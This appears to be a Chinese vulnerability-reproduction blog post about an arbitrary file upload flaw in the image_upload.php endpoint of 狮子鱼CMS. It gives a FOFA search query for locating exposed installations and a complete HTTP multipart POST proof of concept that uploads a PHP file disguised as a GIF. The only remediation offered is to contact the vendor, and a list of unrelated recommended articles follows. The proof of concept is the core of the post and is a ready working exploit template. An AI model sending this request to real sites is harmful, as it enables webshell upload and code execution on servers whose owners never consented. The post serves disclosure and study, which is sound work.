【漏洞复现】狮子鱼CMS文件上传漏洞(image_upload.php)

Nx01 产品简介

狮子鱼CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。

Nx02 漏洞描述

狮子鱼CMS image_upload.php文件存在任意文件上传漏洞,攻击者可能利用这个漏洞上传恶意文件并执行恶意代码。

Nx03 产品主页

fofa-query: body="/seller.php?s=/Public/login"

Nx04 漏洞复现

POC:

复制代码
POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjGdyeoVHUBbniBlK

------WebKitFormBoundaryjGdyeoVHUBbniBlK
Content-Disposition: form-data; name="files"; filename="test.php"
Content-Type: image/gif

<?php echo 'hello'?>
------WebKitFormBoundaryjGdyeoVHUBbniBlK--

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
IT科技那点事儿26 分钟前
引领AI安全新时代 Accelerate 2025北亚巡展·北京站成功举办
人工智能·安全
竹言笙熙1 小时前
Polarctf2025夏季赛 web java ez_check
java·学习·web安全
朱包林2 小时前
day27-shell编程(自动化)
linux·运维·服务器·网络·shell脚本
SZ1701102313 小时前
IP协议 标识字段 同一个源IP、目的IP和协议号内唯一
网络·网络协议·tcp/ip
lubiii_3 小时前
SQL手工测试(MySQL数据库)
数据库·mysql·web安全·网络安全
狐574 小时前
2025-06-02-IP 地址规划及案例分析
网络·网络协议·tcp/ip
黎茗Dawn5 小时前
5.子网划分及分片相关计算
网络·智能路由器
恰薯条的屑海鸥5 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十四期-XXE模块)
网络·学习·安全·web安全·渗透测试
20242817李臻5 小时前
20242817李臻-安全文件传输系统-项目验收
数据库·安全
科技小E5 小时前
口罩佩戴检测算法AI智能分析网关V4工厂/工业等多场景守护公共卫生安全
网络·人工智能